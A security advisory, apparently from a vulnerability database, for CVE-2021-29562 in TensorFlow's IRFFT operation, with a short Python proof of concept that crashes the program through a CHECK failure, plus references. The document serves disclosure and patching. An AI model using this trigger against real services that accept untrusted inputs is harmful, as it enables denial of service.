CVE-2021-29562: CHECK-fail in `tf.raw_ops.IRFFT`
(updated )
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT:
import tensorflow as tf
values = [-10.0] * 130
values[0] = -9.999999999999995
inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32)
inputs = tf.cast(inputs, dtype=tf.complex64)
fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length)
The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
References
- github.com/advisories/GHSA-36vm-xw34-x4pj
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-490.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-688.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-199.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1c56f53be0b722ca657cbc7df461ed676c8642a2
- github.com/tensorflow/tensorflow/security/advisories/GHSA-36vm-xw34-x4pj
- nvd.nist.gov/vuln/detail/CVE-2021-29562
Detect and mitigate CVE-2021-29562 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →